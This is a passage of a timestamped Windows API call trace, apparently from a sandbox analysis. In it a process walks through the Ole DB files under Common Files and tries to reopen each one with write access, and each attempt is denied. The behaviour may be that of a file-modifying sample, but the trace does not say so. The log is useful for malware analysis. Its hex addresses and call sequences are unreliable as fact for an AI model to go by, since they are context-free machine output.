InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.980] AreFileApisANSI () returned 1 [0088.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0088.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 57 [0088.980] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.981] GetFileType (hFile=0x360) returned 0x1 [0088.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.981] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.981] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.981] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.981] CloseHandle (hObject=0x360) returned 1 [0088.982] AreFileApisANSI () returned 1 [0088.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0088.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 57 [0088.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.982] GetLastError () returned 0x5 [0088.982] GetLastError () returned 0x5 [0088.982] SetLastError (dwErrCode=0x5) [0088.982] GetLastError () returned 0x5 [0088.982] SetLastError (dwErrCode=0x5) [0088.982] GetLastError () returned 0x5 [0088.982] SetLastError (dwErrCode=0x5) [0088.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.982] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x26f7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oledbvbs.inc", cAlternateFileName="")) returned 1 [0088.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0088.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0088.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0088.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.984] AreFileApisANSI () returned 1 [0088.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", lpUsedDefaultChar=0x0) returned 57 [0088.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.984] AreFileApisANSI () returned 1 [0088.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0089.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 57 [0089.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.218] GetFileType (hFile=0x27c) returned 0x1 [0089.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0089.218] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.218] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.218] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.218] CloseHandle (hObject=0x27c) returned 1 [0089.219] AreFileApisANSI () returned 1 [0089.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0089.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0089.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 57 [0089.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.219] GetLastError () returned 0x5 [0089.219] GetLastError () returned 0x5 [0089.219] SetLastError (dwErrCode=0x5) [0089.219] GetLastError () returned 0x5 [0089.219] SetLastError (dwErrCode=0x5) [0089.219] GetLastError () returned 0x5 [0089.219] SetLastError (dwErrCode=0x5) [0089.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0089.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0089.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.219] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43c80ffc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43c80ffc, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43c80ffc, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqloledb.dll", cAlternateFileName="")) returned 1 [0089.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0089.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0089.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.220] AreFileApisANSI () returned 1 [0089.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll", lpUsedDefaultChar=0x0) returned 57 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0089.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.221] AreFileApisANSI () returned 1 [0089.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0089.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0089.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 57 [0089.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.222] GetFileType (hFile=0x27c) returned 0x1 [0089.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.222] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.223] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.223] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.223] CloseHandle (hObject=0x27c) returned 1 [0089.223] AreFileApisANSI () returned 1 [0089.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0089.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0089.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 57 [0089.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.223] GetLastError () returned 0x5 [0089.223] GetLastError () returned 0x5 [0089.223] SetLastError (dwErrCode=0x5) [0089.223] GetLastError () returned 0x5 [0089.223] SetLastError (dwErrCode=0x5) [0089.223] GetLastError () returned 0x5 [0089.224] SetLastError (dwErrCode=0x5) [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0089.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.224] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43c80ffc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43c80ffc, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43c80ffc, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqloledb.rll", cAlternateFileName="")) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0089.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0089.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0089.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.225] AreFileApisANSI () returned 1 [0089.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", lpUsedDefaultChar=0x0) returned 57 [0089.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0089.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.225] AreFileApisANSI () returned 1 [0089.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0089.225] RtlAllocateHeap 